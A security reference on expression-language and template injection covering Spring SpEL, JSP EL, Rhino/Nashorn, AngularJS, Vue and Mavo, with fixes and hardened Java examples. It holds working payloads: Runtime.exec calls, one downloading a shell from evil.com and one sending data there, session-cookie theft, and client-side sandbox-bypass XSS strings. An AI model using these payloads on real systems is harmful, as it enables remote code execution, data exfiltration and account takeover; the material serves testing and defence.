Expression Language/Template Injection

Server-side expression languages are evaluated by the application itself: JSP 2.0/2.1 EL (Jakarta EL), OGNL (Struts), MVEL and SpEL (Spring). When attacker-controlled input is parsed as an expression rather than merely displayed, the attacker evaluates code on the server, which is why this class is treated as code injection rather than as XSS.

Example:

<c:out value="${person.address.street}"/>

Spring Expression Language (SpEL)

Echo the foo parameter (double evaluation):

<spring:message scope="${param.foo}"/>

JSP EL first resolves ${param.foo} to whatever string the attacker sent; the Spring tag then evaluates that attribute value a second time as an expression, so a parameter value of the form ${...} is executed rather than echoed. This is the behaviour the springJspExpressionSupport switch below turns off.

Testing:

${aaaa}
${"aaaa"}
${99999+1}

If the response shows the literal ${99999+1}, the input is not evaluated; 100000 means EL is evaluating it, and ${"aaaa"} echoing aaaa while ${aaaa} comes back empty confirms it. Once evaluation is confirmed, SpEL reaches static methods through T():

T(java.lang.Runtime).getRuntime().exec("wget http://evil.com/shell.jsp")
(new java.util.Scanner((T(java.lang.Runtime).getRuntime().exec("uname -a").getInputStream()),"UTF-8")).useDelimiter("\\A").next()
new java.net.URL("http://evil.com/ex?data="+??).openConnection().getInputStream().readLine()

The second payload reads the command output back into the response; in the third, ?? is a placeholder for the expression whose result is to be exfiltrated in the request to the attacker's host.

Data leakage (no command execution needed):

${applicationScope}
${requestScope}
http://vulnerable.com/spring/foo?param=${cookie["JSESSIONID"].value}

The implicit scope objects dump application and request attributes; the cookie map hands over the session identifier of whoever's request gets evaluated.

Example Vulnerable Code

ExpressionParser parser = new SpelExpressionParser();
StandardEvaluationContext testContext = new StandardEvaluationContext(TEST_PERSON);
Expression exp = parser.parseExpression(dynamicValue); // dynamicValue is attacker-controlled, e.g. name = 'Bob'
String valueExtracted = exp.getValue(testContext, String.class);

How to fix

Per-page fix (disables all EL on that JSP, including legitimate ${} output):

<%@ page isELIgnored="true" %>

Per-app fix (web.xml; stops Spring JSP tags from evaluating their attribute values as expressions):

<context-param>
    <description>Spring Expression Language Support</description>
    <param-name>springJspExpressionSupport</param-name>
    <param-value>false</param-value>
</context-param>

Neither switch affects Java code that calls SpelExpressionParser directly on user input, as in the example above: that code needs a restricted evaluation context, or must stop treating the input as an expression at all.
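The vulnerable snippet above and a hardened counterpart side by side, as an added example that is not code from the original page. It assumes Spring's spring-expression module on the classpath; the Person class, the method names and the os.name probe (a harmless stand-in for the page's Runtime.exec() payload) are my own constructions. SimpleEvaluationContext in read-only data-binding mode resolves properties on the root object only, so the T() type reference that every payload above depends on is rejected instead of executed.

```java
import org.springframework.expression.EvaluationException;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelInjectionDemo {

    // Constructed stand-in for the page's TEST_PERSON root object (assumption).
    public static class Person {
        private final String name;
        public Person(String name) { this.name = name; }
        public String getName() { return name; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Vulnerable shape from the page: StandardEvaluationContext gives the expression
    // T() type references, new, bean references and every public method on every
    // object it can reach.
    static Object evalUnsafe(String untrusted, Person root) {
        StandardEvaluationContext ctx = new StandardEvaluationContext(root);
        Expression exp = PARSER.parseExpression(untrusted);
        return exp.getValue(ctx);
    }

    // Hardened: SimpleEvaluationContext in read-only data-binding mode only resolves
    // properties on the root object. T(), new, bean references and method calls
    // fail with a SpelEvaluationException instead of running.
    static Object evalSafe(String untrusted, Person root) {
        SimpleEvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        Expression exp = PARSER.parseExpression(untrusted);
        return exp.getValue(ctx, root);
    }

    public static void main(String[] args) {
        Person bob = new Person("Bob");
        String benign = "name";
        // Harmless stand-in for the page's Runtime.exec() payload: any static call
        // reached through T() shows the context is wide open.
        String hostile = "T(java.lang.System).getProperty('os.name')";

        System.out.println("unsafe, benign : " + evalUnsafe(benign, bob));
        System.out.println("unsafe, hostile: " + evalUnsafe(hostile, bob)); // host OS name leaks

        System.out.println("safe, benign   : " + evalSafe(benign, bob));
        try {
            evalSafe(hostile, bob);
            System.out.println("safe, hostile  : evaluated (context is NOT restricted)");
        } catch (EvaluationException e) {
            System.out.println("safe, hostile  : rejected - " + e.getMessage());
        }
    }
}
```

If the application genuinely needs method calls on the bound objects, SimpleEvaluationContext's builder can add withInstanceMethods(), which still keeps T() and new out of reach; if it needs more than that, the input should not be an expression in the first place.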

ScriptEngine / Rhino

Testing:

new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()

The ["(java.lang.String[])"] index is the Rhino/Nashorn syntax for picking the String[] constructor overload explicitly; any command can replace calc.exe.

Example Vulnerable Code

Example 1 (Rhino embedded directly):

import org.mozilla.javascript.*;
Context cx = Context.enter();
[...]
cx.evaluateString(scope, dynamicCodeHere, "", 1, null); // attacker-controlled script; Java is reachable through LiveConnect

Example 2 (javax.script; on JDK 8 to 14 the "js" extension resolves to Nashorn):

import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
ScriptEngineManager scriptEngineManager = new ScriptEngineManager();
ScriptEngine scriptEngine = scriptEngineManager.getEngineByExtension("js");
Object result = scriptEngine.eval(dynamicCodeHere); // same problem: the script can reach java.lang.ProcessBuilder

JDK 15 removed Nashorn, so getEngineByExtension("js") returns null there unless a JavaScript engine jar has been added to the classpath; where one has, the exposure is unchanged.
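Example 1 with the one control Rhino offers for this, as an added example that is not code from the original page. It assumes the Rhino jar (org.mozilla.javascript) on the classpath; the class and method names, and the os.name probe standing in for the page's ProcessBuilder payload, are mine. A ClassShutter is consulted every time script code names a Java class through LiveConnect; returning false for everything means java.lang.ProcessBuilder never resolves to a class, so calling it fails as a type error.

```java
import org.mozilla.javascript.Context;
import org.mozilla.javascript.RhinoException;
import org.mozilla.javascript.Scriptable;

public class RhinoSandboxDemo {

    // Evaluates untrusted JavaScript with a ClassShutter that denies every Java class,
    // so LiveConnect names such as java.lang.ProcessBuilder never resolve to a class.
    static Object evalSandboxed(String untrusted) {
        Context cx = Context.enter();
        try {
            // A ClassShutter can be installed once per Context; do it before any script runs.
            cx.setClassShutter(fullClassName -> false);
            Scriptable scope = cx.initStandardObjects();
            return cx.evaluateString(scope, untrusted, "<untrusted>", 1, null);
        } finally {
            Context.exit();
        }
    }

    // The page's vulnerable shape, kept for comparison: no shutter, Java fully reachable.
    static Object evalUnsandboxed(String untrusted) {
        Context cx = Context.enter();
        try {
            Scriptable scope = cx.initStandardObjects();
            return cx.evaluateString(scope, untrusted, "<untrusted>", 1, null);
        } finally {
            Context.exit();
        }
    }

    public static void main(String[] args) {
        String benign = "7 * 7";
        // Harmless stand-in for the page's ProcessBuilder payload: a static Java call.
        String hostile = "java.lang.System.getProperty('os.name')";

        System.out.println("unsandboxed, benign : " + Context.toString(evalUnsandboxed(benign)));
        System.out.println("unsandboxed, hostile: " + Context.toString(evalUnsandboxed(hostile))); // leaks os.name

        System.out.println("sandboxed, benign   : " + Context.toString(evalSandboxed(benign)));
        try {
            evalSandboxed(hostile);
            System.out.println("sandboxed, hostile  : evaluated (shutter is NOT in effect)");
        } catch (RhinoException e) {
            System.out.println("sandboxed, hostile  : rejected - " + e.getMessage());
        }
    }
}
```

The shutter only governs class lookup from script: any Java object the host puts into the scope stays reachable with all of its public methods, so keep the scope to plain data. It also does nothing against runaway scripts; CPU and memory limits need a ContextFactory with an instruction-observer threshold on top of this.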

Jinja

Server-Side Template Injection

AngularJS

Examples:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

Which payload fires depends on the AngularJS version: 1.2 through 1.5 shipped an expression sandbox that each of these bypasses in a different way, and 1.6 removed the sandbox entirely, so the plain constructor.constructor form works there again. The ng-csp variant is for pages whose Content-Security-Policy blocks eval and inline scripts.


VueJS

Evading defences using VueJS script gadgets

Examples:

<!-- Google Research - Vue.js -->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

Vue 3 examples:

{{_openBlock.constructor('alert(1)')()}}

Vue 2 examples:

{{constructor.constructor('alert(1)')()}}

Mavo

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]